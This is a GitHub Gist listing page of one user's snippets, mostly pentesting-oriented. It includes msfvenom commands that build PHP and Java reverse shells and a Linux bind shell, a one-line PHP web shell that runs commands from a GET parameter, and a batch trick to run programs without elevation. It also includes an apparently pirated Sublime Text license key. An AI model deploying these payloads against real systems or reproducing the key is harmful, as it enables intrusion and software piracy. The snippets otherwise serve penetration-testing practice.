Skip to content

Instantly share code, notes, and snippets.

@swarupsro
swarupsro / msf_pay.md
Created November 3, 2025 09:52 — forked from dejisec/msf_pay.md
MSFVenom Payloads

PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

Java WAR reverse shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

Linux bind shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux FreeBSD reverse shell

@swarupsro
swarupsro / wazuh_uninstall.sh
Last active June 12, 2025 11:03
Complete Wazuh Uninstallation Script
#!/bin/bash
echo "[*] Stopping Wazuh-related services..."
sudo systemctl stop wazuh-manager wazuh-indexer filebeat wazuh-dashboard
echo "[*] Disabling services..."
sudo systemctl disable wazuh-manager wazuh-indexer filebeat wazuh-dashboard
echo "[*] Purging installed packages..."
sudo apt purge --yes wazuh-manager wazuh-indexer wazuh-dashboard filebeat
@swarupsro
swarupsro / vcredistr.md
Created November 27, 2024 18:54 — forked from ChuckMichael/vcredistr.md
Visual C++ Redistributable Packages
@swarupsro
swarupsro / ohwindows.bat
Last active January 16, 2024 16:58
Oh Windows
Set __COMPAT_LAYER=RunAsInvoker
Start fun.exe
@swarupsro
swarupsro / InstallerConfig.yaml
Last active December 29, 2023 18:11
Ubuntu Server Manual IP Configuration
# This network configuration written for MTB
network:
version: 2
ethernets:
ens160:
addresses:
- 172.16.21.230/24
nameservers:
addresses:
@swarupsro
swarupsro / mac-changer-win.bat
Last active August 20, 2023 08:58
Mac Address Changer
@echo off
:menu
cls
echo MAC Address Changer Menu
echo Swarup Saha
echo.
echo 1. Change MAC Address
echo 2. Reset MAC Address
echo 3. Exit
@swarupsro
swarupsro / Exploitation.md
Created July 10, 2023 19:07 — forked from yezz123/Exploitation.md
Pentesting-Exploitation
@swarupsro
swarupsro / report.py
Created June 4, 2023 16:48 — forked from Huntinex/report.py
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@swarupsro
swarupsro / 1-shell.php
Last active March 19, 2023 04:30
PHP Shells
<?php system($_GET['cmd']); ?>
@swarupsro
swarupsro / build4123.sublime4.key
Created November 28, 2022 22:45
Sublime Text 4 License Key {Latest}
—– BEGIN LICENSE —–
Mifeng User
Single User License
EA7E-1184812
C0DAA9CD 6BE825B5 FF935692 1750523A
EDF59D3F A3BD6C96 F8D33866 3F1CCCEA
1C25BE4D 25B1C4CC 5110C20E 5246CC42
D232C83B C99CCC42 0E32890C B6CBF018
B1D4C178 2F9DDB16 ABAA74E5 95304BEF
9D0CCFA9 8AF8F8E2 1E0A955E 4771A576